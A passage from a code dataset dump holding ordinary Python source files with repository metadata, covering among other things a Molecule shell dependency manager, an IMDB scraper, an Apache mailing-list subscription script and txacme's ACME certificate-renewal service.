out_path,True\n\n", "repo_name": "WeiMin-Li-visual/tradmedical", "sub_path": "algorithm/yolov3/yolo_tongue.py", "file_name": "yolo_tongue.py", "file_ext": "py", "file_size_in_byte": 10156, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.__version__", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.cuda.is_available", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "algorithm.yolov3.nets.yolo3.YoloBody", "line_number": 91, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.nn.DataParallel", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "algorithm.yolov3.utils.utils.DecodeBox", "line_number": 112, "usage_type": "call"}, {"api_name": "colorsys.hsv_to_rgb", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 130, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 130, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "algorithm.yolov3.utils.utils.letterbox_image", "line_number": 143, "usage_type": "call"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 145, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 145, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 147, "usage_type": "attribute"}, {"api_name": "numpy.transpose", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 170, "usage_type": "call"}, {"api_name": "algorithm.yolov3.utils.utils.non_max_suppression", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 187, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 190, "usage_type": "call"}, {"api_name": "algorithm.yolov3.utils.utils.yolo_correct_boxes", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 211, "usage_type": "call"}]} +{"seq_id": "29384195011", "text": "import os\n\nimport sh\n\nfrom molecule import logger\nfrom molecule import util\nfrom molecule.dependency import base\n\nLOG = logger.get_logger(__name__)\n\n\nclass Shell(base.Base):\n \"\"\"\n `Shell` is an alternate dependency manager. It is intended to run a\n command in situations where `Ansible Galaxy`_ and `Gilt`_ don't suffice.\n\n The `command` to execute is required, and is relative to Molecule's project\n directory when referencing a script not in $PATH.\n\n .. note::\n\n Unlike the other dependency managers, `options` are ignored and not\n passed to `shell`. Additional flags/subcommands should simply be added\n to the `command`.\n\n .. code-block:: yaml\n\n dependency:\n name: shell\n command: path/to/command --flag1 subcommand --flag2\n\n The dependency manager can be disabled by setting `enabled` to False.\n\n .. code-block:: yaml\n\n dependency:\n name: shell\n command: path/to/command --flag1 subcommand --flag2\n enabled: False\n\n Environment variables can be passed to the dependency.\n\n .. code-block:: yaml\n\n dependency:\n name: shell\n command: path/to/command --flag1 subcommand --flag2\n env:\n FOO: bar\n \"\"\"\n\n def __init__(self, config):\n super(Shell, self).__init__(config)\n self._sh_command = None\n\n # self.command = config..config['dependency']['command']\n\n @property\n def command(self):\n return self._config.config['dependency']['command']\n\n @property\n def default_options(self):\n return {}\n\n @property\n def default_env(self):\n return util.merge_dicts(os.environ.copy(), self._config.env)\n\n def bake(self):\n \"\"\"\n Bake a `shell` command so it's ready to execute and returns None.\n\n :return: None\n \"\"\"\n command_list = self.command.split(' ')\n command, args = command_list[0], command_list[1:]\n\n self._sh_command = getattr(sh, command)\n # Reconstruct command with remaining args.\n self._sh_command = self._sh_command.bake(\n args, _env=self.env, _out=LOG.out, _err=LOG.error)\n\n def execute(self):\n if not self.enabled:\n msg = 'Skipping, dependency is disabled.'\n LOG.warn(msg)\n return\n\n if self._sh_command is None:\n self.bake()\n\n try:\n util.run_command(self._sh_command, debug=self._config.debug)\n msg = 'Dependency completed successfully.'\n LOG.success(msg)\n except sh.ErrorReturnCode as e:\n util.sysexit(e.exit_code)\n\n def _has_command_configured(self):\n return 'command' in self._config.config['dependency']\n", "repo_name": "amitvashist7/ansible-development-CTS", "sub_path": "molecule/my_env/lib/python2.7/site-packages/molecule/dependency/shell.py", "file_name": "shell.py", "file_ext": "py", "file_size_in_byte": 2735, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "molecule.logger.get_logger", "line_number": 9, "usage_type": "call"}, {"api_name": "molecule.logger", "line_number": 9, "usage_type": "name"}, {"api_name": "molecule.dependency.base.Base", "line_number": 12, "usage_type": "attribute"}, {"api_name": "molecule.dependency.base", "line_number": 12, "usage_type": "name"}, {"api_name": "molecule.util.merge_dicts", "line_number": 68, "usage_type": "call"}, {"api_name": "molecule.util", "line_number": 68, "usage_type": "name"}, {"api_name": "os.environ.copy", "line_number": 68, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 68, "usage_type": "attribute"}, {"api_name": "molecule.util.run_command", "line_number": 94, "usage_type": "call"}, {"api_name": "molecule.util", "line_number": 94, "usage_type": "name"}, {"api_name": "sh.ErrorReturnCode", "line_number": 97, "usage_type": "attribute"}, {"api_name": "molecule.util.sysexit", "line_number": 98, "usage_type": "call"}, {"api_name": "molecule.util", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "21567033546", "text": "from scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom imdb_scrape.items import ImdbScrapeItem\nfrom scrapy.http.request import Request\n\nimport csv\n\nclass MySpider(BaseSpider):\n name = \"imdb\"\n allowed_domains = [\"imdb.com\"]\n #start_urls = [\"http://www.imdb.com/title/tt0109950/?ref_=fn_al_tt_1\"]\n #start_urls = [\"http://www.imdb.com/find?ref_=nv_sr_fn&q=/Toy Story (1995)\"]\n #lines=[]\n movies=[]\n text_file = open(\"movies.dat\", \"r\")\n lines = text_file.read().split('\\n')\n l=[]\n for line in lines:\n line = line.split(\"::\")\n l.append(line)\n #with open('Test.dat','r') as f:\n # reader=csv.reader(f,delimiter=\":\")\n # for line in reader:\n # lines.append([l for l in line if l.strip() != ''])\n l = l[:3883]\n for line in l:\n movies.append(line[1])\n urls = []\n for movie in movies:\n urls.append(\"http://www.imdb.com/find?ref_=nv_sr_fn&q=/\" + movie)\n start_urls = urls \n \n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n link = hxs.select(\"//div[@class='findSection']/table[@class='findList']/tr/td/a/@href\").extract()[0]\n link = \"http://www.imdb.com\" + link\n yield Request(link, callback=self.parse_movies)\n \n def parse_movies(self, response):\n hxs = HtmlXPathSelector(response)\n rating = hxs.select(\"//span[@itemprop='ratingValue']/text()\").extract()[0]\n cast = hxs.select('//table[@class=\"cast_list\"]/tr/td[@itemprop=\"actor\"]//text()').extract()\n cast = filter(None, self.trim_list(cast))\n director = hxs.select('//span[@itemprop=\"director\"]/a/span[@itemprop=\"name\"]/text()').extract()\n director = self.trim_list(director)\n movie_name = hxs.select('//div[@class=\"title_wrapper\"]/h1[@itemprop=\"name\"]/text()').extract()\n movie_name = filter(None, self.trim_list(movie_name))\n year = hxs.select('//span[@id=\"titleYear\"]/a/text()').extract()\n year = self.trim_list(year)\n #print movie_name, year, rating, director, cast\n item = ImdbScrapeItem()\n item['movie_name'] = movie_name\n item['year'] = year\n item['rating'] = rating\n item['director'] = director\n item['cast'] = cast\n return item\n \n def trim(self, raw_str):\n \"\"\"\n Removes unicode strings from given string. Utility function\n being invoked by multiple functions. Returned value has also\n been stripped.\n \"\"\"\n return raw_str.encode('ascii', errors='ignore').strip()\n\n def trim_list(self, raw_list):\n \"\"\"\n Given a list containing strings that have unicode parts, it\n returns a list having no unicode strings. List items have\n also been stripped.\n \"\"\"\n return [self.trim(raw_str) for raw_str in raw_list] \n\n def get_urls():\n lines=[]\n movies=[]\n with open('Movies.dat','r') as f:\n reader=csv.reader(f,delimiter=\":\")\n for line in reader:\n lines.append([l for l in line if l.strip() != ''])\n for line in lines:\n movies.append(line[1])\n urls = []\n for movie in movies:\n urls.append(\"http://www.imdb.com/find?ref_=nv_sr_fn&q=/\" + movie)\n return urls ", "repo_name": "erwenzhang/Recommender_System", "sub_path": "imdb_scrape/imdb_scrape/spiders/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3324, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "scrapy.spider.BaseSpider", "line_number": 8, "usage_type": "name"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 34, "usage_type": "call"}, {"api_name": "scrapy.http.request.Request", "line_number": 37, "usage_type": "call"}, {"api_name": "scrapy.selector.HtmlXPathSelector", "line_number": 40, "usage_type": "call"}, {"api_name": "imdb_scrape.items.ImdbScrapeItem", "line_number": 51, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 79, "usage_type": "call"}]} +{"seq_id": "23535696661", "text": "# -*- coding: utf-8 -*-\n# 3.0\n\n# \n\nimport sys\nimport numpy as np\nfrom collections import Counter\nimport string\n\ndef solve_case(num, cnts):\n counter = Counter()\n alph = list(string.ascii_uppercase)\n tot = 0\n ret = \"\"\n num_parties = num\n for i, cnt in enumerate(cnts.split(\" \")):\n counter[alph[i]] = int(cnt)\n tot += int(cnt)\n \n while tot > 3:\n party, p_cnt = counter.most_common(2)[0]\n party2, p_cnt2 = counter.most_common(2)[1]\n if p_cnt > p_cnt2:\n ret += party+party + \" \"\n counter[party] -= 2\n else:\n ret += party + party2 + \" \"\n counter[party] -= 1\n counter[party2] -= 1\n tot -= 2\n \n if tot == 3:\n party, _ = counter.most_common(1)[0]\n ret += party + \" \"\n counter[party] -= 1\n tot -= 1\n if tot == 2:\n party, p_cnt = counter.most_common(2)[0]\n party2, p_cnt2 = counter.most_common(2)[1]\n ret += party + party2\n tot -= 2\n assert tot == 0\n return ret\n\nnum_cases = int(sys.stdin.readline())\nfor n in range(1, num_cases + 1):\n num_parties = int(sys.stdin.readline())\n counts = sys.stdin.readline()\n print(\"Case #{0}: {1}\".format(n, solve_case(num_parties, counts)) )\n", "repo_name": "dr-dos-ok/Code_Jam_Webscraper", "sub_path": "solutions_python/Problem_187/716.py", "file_name": "716.py", "file_ext": "py", "file_size_in_byte": 1304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.Counter", "line_number": 12, "usage_type": "call"}, {"api_name": "string.ascii_uppercase", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 48, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 49, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 49, "usage_type": "attribute"}]} +{"seq_id": "16419253117", "text": "#!/usr/bin/env python\n\nimport glob\nimport json\nimport logging\nimport os\nimport tempfile\nimport subprocess\nimport string\nimport sys\n\n# include common path variables\nexecfile(\"common.conf\")\n\nfrom collections import namedtuple\nEntry = namedtuple('Entry', 'listkey availid listaddr')\n\nPROGNAME = os.path.basename(sys.argv[0])\nlogging.getLogger().name = sys.argv[0]\n\nSVN_CONFIG_DIR = 'APMAIL_HOME/.subversion2'\n\nBASEDIR = 'APMAIL_HOME/lists'\n\nclass Hooks:\n @staticmethod\n def welcome(entry):\n listkey, availid = entry.listkey, entry.availid\n if 'security' not in listkey and 'trademarks' not in listkey:\n return # DECLINED\n try:\n stdin = tempfile.SpooledTemporaryFile()\n if op == 'sub':\n stdin.write('Welcome %s@!\\n'\n '\\n'\n 'You are now subscribed to the privately-archived %s@ mailing list!\\n'\n % (availid, listkey))\n else:\n stdin.write('Welcome %s@!\\n'\n '\\n'\n 'You are now unsubscribed from the privately-archived %s@ mailing list!\\n'\n % (availid, listkey))\n stdin.flush()\n stdin.seek(0)\n subprocess.check_call(['mail', '-s', \"Welcome %s@!\" % availid,\n entry.listaddr],\n stdin=stdin)\n except Exception as e:\n logging.warn('%s: %s', type(e).__name__, e)\n\nHOOKS = [\n # Hook functions should never raise; if they have a problem, they should\n # log it. They should return None.\n Hooks.welcome,\n]\n\nclass Skip(Exception):\n pass\n\ndef key2dir(listkey):\n # special processing for empire-db\n if listkey.startswith('empire-db-'):\n base = 'empire-db'\n else:\n base = listkey.split('-', 1)[0]\n tail = listkey[len(base)+1:]\n dirs = [\n 'apache.org/%s' % listkey,\n ['%s.apache.org/%s', '%s.com/%s'][base == 'apachecon'] % (base, tail),\n ]\n dirs = ['%s/%s' % (BASEDIR, d) for d in dirs]\n dirs = filter(os.path.isdir, dirs)\n dirs = filter(lambda d: d[-1] != '/', dirs) # 'community'\n if len(dirs) != 1:\n raise Skip(\"Wrong number of dirs found for %r: %r\" % (listkey, dirs))\n return dirs[0]\n\ndef process_entry(fn, op):\n j = json.load(open(fn))\n if j['version'] not in [2,3]:\n raise Skip(\"Unknown format %r\" % j['version'])\n\n availid = j['availid']\n addr = j['addr']\n listkey = j['listkey']\n\n # not sure whether leading hyphens are okay, so forbid them\n assert addr[0] in string.letters + string.digits + '_'\n\n listdir = key2dir(listkey)\n assert os.path.isabs(listdir)\n mop = '+=' if op != 'unsub' else '-='\n logging.info(\"%s@ %s %s\", listkey, mop, availid)\n subprocess.check_call([\n 'ezmlm-' + op,\n '-n',\n listdir, '.',\n addr, 'via:%s' % PROGNAME,\n ])\n listaddr = open(os.path.join(listdir, 'outlocal')).read().rstrip() + \"@\" + \\\n open(os.path.join(listdir, 'outhost')).read().rstrip()\n return Entry(listkey=listkey, availid=availid, listaddr=listaddr)\n\ndef run_hooks(entry, hooks):\n for hook in hooks:\n try:\n hook(entry)\n except Exception as e:\n # Violation of hook API.\n logging.error(\"Hook raised an exception: \"\n \"hook=(%s, %r), exception=(%s, %s)\",\n getattr(hook, 'func_name'), hook,\n type(e).__name__, e)\n\ndef main(op):\n os.chdir('APMAIL_HOME/' + op + 'req')\n success = set()\n for fn in sys.argv[1:] or glob.glob('*.json'):\n try:\n entry = process_entry(fn, op)\n except Skip as skip:\n logging.warn('Skipped %r: %s' % (fn, skip.message))\n else:\n subprocess.check_call(['svn', 'rm', '--quiet', '--', fn])\n success.add(entry)\n for entry in success:\n run_hooks(entry, HOOKS)\n mop = '+=' if op != 'unsub' else '-='\n subprocess.check_call([\n 'svn', 'commit', '--quiet', '--config-dir', SVN_CONFIG_DIR,\n '-m', 'Process requests:\\n' + '\\n'.join(sorted(\n '%s@ %s %s' % (entry.listkey, mop, entry.availid)\n for entry in success)),\n ])\n\nif __name__ == '__main__':\n main('sub')\n main('unsub')\n", "repo_name": "jromy5/git-clone-https-github.com-apache-infrastructure-puppet", "sub_path": "modules/qmail_asf/files/apmail/bin/subreq.py", "file_name": "subreq.py", "file_ext": "py", "file_size_in_byte": 4384, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.namedtuple", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tempfile.SpooledTemporaryFile", "line_number": 32, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 79, "usage_type": "call"}, {"api_name": "string.letters", "line_number": 88, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.isabs", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 93, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 110, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 116, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 118, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 118, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 122, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 124, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "33112354773", "text": "import os\nfrom time import time\n\nimport boto3\n\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n\nBUCKET = 'dojo-skool-10'\nS3_IMAGES_DIRECTORY = 'src_images/'\n\n\ndef pull_last_image():\n s3 = boto3.resource('s3',\n aws_access_key_id=AWS_ACCESS_KEY_ID,\n aws_secret_access_key=AWS_SECRET_ACCESS_KEY)\n s3_client = boto3.client('s3')\n\n response = s3_client.list_objects(\n Bucket=BUCKET,\n Prefix=S3_IMAGES_DIRECTORY\n )\n\n last_image = response['Contents'][-1]['Key']\n image_path = 'images/traffic_{}.jpg'.format(int(time()))\n s3_client.download_file(BUCKET,\n last_image,\n image_path)\n\n\nif __name__ == '__main__':\n pull_last_image()\n", "repo_name": "paulden/dojo-terraform-ansible", "sub_path": "data_code/pull_last_file_from_bucket.py", "file_name": "pull_last_file_from_bucket.py", "file_ext": "py", "file_size_in_byte": 831, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ.get", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 7, "usage_type": "attribute"}, {"api_name": "boto3.resource", "line_number": 14, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 17, "usage_type": "call"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "17597327984", "text": "from datetime import timedelta\nfrom functools import partial\n\nfrom acme import messages\nimport attr\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom pem import Certificate, Key\nfrom twisted.application.internet import TimerService\nfrom twisted.application.service import Service\nfrom twisted.internet.defer import Deferred, gatherResults, succeed\nfrom twisted.logger import Logger\n\nfrom txacme.client import answer_challenge, fqdn_identifier, poll_until_valid\nfrom txacme.messages import CertificateRequest\nfrom txacme.util import clock_now, csr_for_names, generate_private_key, tap\n\n\nlog = Logger()\n\n\ndef _default_panic(failure, server_name):\n log.failure(\n u'PANIC! Unable to renew certificate for: {server_name!r}',\n failure, server_name=server_name)\n\n\n@attr.s(cmp=False, hash=False)\nclass AcmeIssuingService(Service):\n \"\"\"\n A service for keeping certificates up to date by using an ACME server.\n\n :param .ICertificateStore cert_store: The certificate store containing the\n certificates to manage.\n :type client_creator: Callable[[], Deferred[`txacme.client.Client`]]\n :param client_creator: A callable called with no arguments\n for creating the ACME client. For example, ``partial(Client.from_url,\n reactor=reactor, url=LETSENCRYPT_STAGING_DIRECTORY, key=acme_key,\n alg=RS256)``.\n :param clock: ``IReactorTime`` provider; usually the reactor, when not\n testing.\n\n :type responders: List[`.IResponder`]\n :param responders: Challenge responders. Usually only one responder is\n needed; if more than one responder for the same type is provided, only\n the first will be used.\n :param str email: An (optional) email address to use during registration.\n :param ~datetime.timedelta check_interval: How often to check for expiring\n certificates.\n :param ~datetime.timedelta reissue_interval: If a certificate is expiring\n in less time than this interval, it will be reissued.\n :param ~datetime.timedelta panic_interval: If a certificate is expiring in\n less time than this interval, and reissuing fails, the panic callback\n will be invoked.\n\n :type panic: Callable[[Failure, `str`], Deferred]\n :param panic: A callable invoked with the failure and server name when\n reissuing fails for a certificate expiring in the ``panic_interval``.\n For example, you could generate a monitoring alert. The default\n callback logs a message at *CRITICAL* level.\n :param generate_key: A 0-arg callable used to generate a private key for a\n new cert. Normally you would not pass this unless you have specialized\n key generation requirements.\n \"\"\"\n cert_store = attr.ib()\n _client_creator = attr.ib()\n _clock = attr.ib()\n _responders = attr.ib()\n _email = attr.ib(default=None)\n check_interval = attr.ib(default=timedelta(days=1))\n reissue_interval = attr.ib(default=timedelta(days=30))\n panic_interval = attr.ib(default=timedelta(days=15))\n _panic = attr.ib(default=_default_panic)\n _generate_key = attr.ib(default=partial(generate_private_key, u'rsa'))\n\n _waiting = attr.ib(default=attr.Factory(list), init=False)\n _issuing = attr.ib(default=attr.Factory(dict), init=False)\n ready = False\n\n def _now(self):\n \"\"\"\n Get the current time.\n \"\"\"\n return clock_now(self._clock)\n\n def _check_certs(self):\n \"\"\"\n Check all of the certs in the store, and reissue any that are expired\n or close to expiring.\n \"\"\"\n log.info('Starting scheduled check for expired certificates.')\n\n def check(certs):\n panicing = set()\n expiring = set()\n for server_name, objects in certs.items():\n if len(objects) == 0:\n panicing.add(server_name)\n for o in filter(lambda o: isinstance(o, Certificate), objects):\n cert = x509.load_pem_x509_certificate(\n o.as_bytes(), default_backend())\n until_expiry = cert.not_valid_after - self._now()\n if until_expiry <= self.panic_interval:\n panicing.add(server_name)\n elif until_expiry <= self.reissue_interval:\n expiring.add(server_name)\n\n log.info(\n 'Found {panicing_count:d} overdue / expired and '\n '{expiring_count:d} expiring certificates.',\n panicing_count=len(panicing),\n expiring_count=len(expiring))\n\n d1 = (\n gatherResults(\n [self._with_client(self._issue_cert, server_name)\n .addErrback(self._panic, server_name)\n for server_name in panicing],\n consumeErrors=True)\n .addCallback(done_panicing))\n d2 = gatherResults(\n [self.issue_cert(server_name)\n .addErrback(\n lambda f: log.failure(\n u'Error issuing certificate for: {server_name!r}',\n f, server_name=server_name))\n for server_name in expiring],\n consumeErrors=True)\n return gatherResults([d1, d2], consumeErrors=True)\n\n def done_panicing(ignored):\n self.ready = True\n for d in list(self._waiting):\n d.callback(None)\n self._waiting = []\n\n return (\n self._ensure_registered()\n .addCallback(lambda _: self.cert_store.as_dict())\n .addCallback(check)\n .addErrback(\n lambda f: log.failure(\n u'Error in scheduled certificate check.', f)))\n\n def issue_cert(self, server_name):\n \"\"\"\n Issue a new cert for a particular name.\n\n If an existing cert exists, it will be replaced with the new cert. If\n issuing is already in progress for the given name, a second issuing\n process will *not* be started.\n\n :param str server_name: The name to issue a cert for.\n\n :rtype: ``Deferred``\n :return: A deferred that fires when issuing is complete.\n \"\"\"\n def finish(result):\n _, waiting = self._issuing.pop(server_name)\n for d in waiting:\n d.callback(result)\n\n # d_issue is assigned below, in the conditional, since we may be\n # creating it or using the existing one.\n d = Deferred(lambda _: d_issue.cancel())\n if server_name in self._issuing:\n d_issue, waiting = self._issuing[server_name]\n waiting.append(d)\n else:\n d_issue = self._with_client(self._issue_cert, server_name)\n waiting = [d]\n self._issuing[server_name] = (d_issue, waiting)\n # Add the callback afterwards in case we're using a client\n # implementation that isn't actually async\n d_issue.addBoth(finish)\n return d\n\n def _with_client(self, f, *a, **kw):\n \"\"\"\n Construct a client, and perform an operation with it.\n \"\"\"\n return self._client_creator().addCallback(f, *a, **kw)\n\n def _issue_cert(self, client, server_name):\n \"\"\"\n Issue a new cert for a particular name.\n \"\"\"\n log.info(\n 'Requesting a certificate for {server_name!r}.',\n server_name=server_name)\n key = self._generate_key()\n objects = [\n Key(key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption()))]\n\n def answer_and_poll(authzr):\n def got_challenge(stop_responding):\n return (\n poll_until_valid(authzr, self._clock, client)\n .addBoth(tap(lambda _: stop_responding())))\n return (\n answer_challenge(authzr, client, self._responders)\n .addCallback(got_challenge))\n\n def got_cert(certr):\n objects.append(\n Certificate(\n x509.load_der_x509_certificate(\n certr.body, default_backend())\n .public_bytes(serialization.Encoding.PEM)))\n return certr\n\n def got_chain(chain):\n for certr in chain:\n got_cert(certr)\n log.info(\n 'Received certificate for {server_name!r}.',\n server_name=server_name)\n return objects\n\n return (\n client.request_challenges(fqdn_identifier(server_name))\n .addCallback(answer_and_poll)\n .addCallback(lambda ign: client.request_issuance(\n CertificateRequest(\n csr=csr_for_names([server_name], key))))\n .addCallback(got_cert)\n .addCallback(client.fetch_chain)\n .addCallback(got_chain)\n .addCallback(partial(self.cert_store.store, server_name)))\n\n def _ensure_registered(self):\n \"\"\"\n Register if needed.\n \"\"\"\n if self._registered:\n return succeed(None)\n else:\n return self._with_client(self._register)\n\n def _register(self, client):\n \"\"\"\n Register and agree to the TOS.\n \"\"\"\n def _registered(regr):\n self._regr = regr\n self._registered = True\n regr = messages.NewRegistration.from_data(email=self._email)\n return (\n client.register(regr)\n .addCallback(client.agree_to_tos)\n .addCallback(_registered))\n\n def when_certs_valid(self):\n \"\"\"\n Get a notification once the startup check has completed.\n\n When the service starts, an initial check is made immediately; the\n deferred returned by this function will only fire once reissue has been\n attempted for any certificates within the panic interval.\n\n .. note:: The reissue for any of these certificates may not have been\n successful; the panic callback will be invoked for any certificates\n in the panic interval that failed reissue.\n\n :rtype: ``Deferred``\n :return: A deferred that fires once the initial check has resolved.\n \"\"\"\n if self.ready:\n return succeed(None)\n d = Deferred()\n self._waiting.append(d)\n return d\n\n def startService(self):\n Service.startService(self)\n self._registered = False\n self._timer_service = TimerService(\n self.check_interval.total_seconds(), self._check_certs)\n self._timer_service.clock = self._clock\n self._timer_service.startService()\n\n def stopService(self):\n Service.stopService(self)\n self.ready = False\n self._registered = False\n for d in list(self._waiting):\n d.cancel()\n self._waiting = []\n return self._timer_service.stopService()\n\n\n__all__ = ['AcmeIssuingService']\n", "repo_name": "markrwilliams/txacme", "sub_path": "src/txacme/service.py", "file_name": "service.py", "file_ext": "py", "file_size_in_byte": 11242, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "twisted.logger.Logger", "line_number": 20, "usage_type": "call"}, {"api_name": "twisted.application.service.Service", "line_number": 30, "usage_type": "name"}, {"api_name": "attr.ib", "line_number": 66, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 67, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 68, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 69, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 70, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 71, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 72, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 72, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 73, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 73, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 74, "usage_type": "call"}, {"api_name": "attr.ib", "line_number": 75, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 75, "usage_type": "call"}, {"api_name": "txacme.util.generate_private_key", "line_number": 75, "usage_type": "argument"}, {"api_name": 